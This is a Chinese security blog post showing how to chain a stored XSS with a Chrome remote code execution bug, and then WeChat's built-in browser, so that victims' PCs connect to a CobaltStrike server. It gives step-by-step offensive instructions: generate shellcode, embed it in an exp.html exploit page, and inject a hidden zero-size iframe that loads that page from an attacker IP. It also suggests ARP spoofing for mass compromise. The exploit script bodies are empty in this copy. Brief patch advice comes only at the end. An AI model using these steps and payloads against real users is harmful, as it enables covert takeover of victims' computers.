长亭百川云 - 文章详情

XSS + Chrome Rce = 上线到CobaltStrike

InBug实验室

76

2024-07-13

前言

最近 Google Chrome 浏览器被爆出存在远程代码执行漏洞(CNVD-2021-27989),攻击者只需要构造一个恶意的 html 页面诱导用户点击访问,就能实现对浏览器的远程代码执行攻击。但是攻击者单独利用该漏洞无法实现沙盒(SandBox)逃逸。沙盒是 Google Chrome 浏览器的安全边界,防止恶意攻击代码破坏用户系统或者浏览器其他页面。Google Chrome 浏览器默认开启沙盒保护模式。

漏洞影响范围:Google Chrome < = 89.0.4389.114。

点击链接打开记事本

该 Poc 来自于网络:

<script>

手动打开 Chrome 的时候关闭沙箱然后打开 poc.html 即可弹出记事本:

chrome.exe -no-sandbox

点击链接上线到 CobaltStrike

首先通过 CobaltStrike 开启一个监听器,我这边选择的是 http:

之后生成一个 C 的 shellcode(x64):

之后把生成的 Poc 中的 shellcode,\ 替换为 ,0  :

替换前:

替换后:

之后把 shellcode 替换到第七行里:

<script>

随后保存为 exp.html ,让目标打开:

这个时候目标成功上线到 CobaltStrike:

XSS+Chrome Rce = 上线到CobaltStrike

    假设有一个网站存在存储XSS漏洞,可以插入这段 Payload 并加载一个远程 html 页面,若目标机器关闭了沙盒并且使用的是 Chrome 浏览器,就可导致访问此页面的人上线到 CobaltStrike。

    同时,在内网场景也可使用ARP来进行大规模PC权限的获取。

    具体使用到的标签是:

<iframe src="http://192.168.84.248/exp.html" width="0" height="0">

我把宽度和高度都设置为 0 ,这样目标就无法看到 exp.html 页面了!

演示代码:

其中 http://192.168.84.248/exp.html 是攻击者构造好的恶意页面,当我们访问到了被插入 XSS Payload 的页面,就会自动加载 exp.html 成功上线到 CobaltStrike:

思路大家可自由延伸。

Windows版微信加载JS运行Shellcode

通过微信点击URL链接,过程中会调用微信内置浏览器(chrome内核,并开启了--no-sandbox参数)。针对chrome漏洞利用的js代码成功执行后,shellcode将启动远控进程,最终获取该PC当前用户权限。

Chrome安全问题可能导致Windows版微信任意代码执行漏洞

组件: Windows版微信

漏洞类型: 远程代码执行

影响: PC接管

简述: 攻击者可以通过微信发送一个特制的web链接,用户一旦点击链接,Windows版微信便会加载执行攻击者构造恶意代码,最终使攻击者控制用户PC。

 Tencnet:Windows版微信: 小于等于3.2.1.141版本修复建议

通用修补建议

目前微信已经修复漏洞并发布了更新版本,建议用户立即将Windows版微信更新到3.2.1.141``以上的最新版本

InBug-实验室

官网:https://www.inbug.org/

InScan内网扫描器:https://github.com/inbug-team/InScan

相关推荐
关注或联系我们
添加百川云公众号,移动管理云安全产品
咨询热线:
4000-327-707
百川公众号
百川公众号
百川云客服
百川云客服

Copyright ©2024 北京长亭科技有限公司
icon
京ICP备 2024055124号-2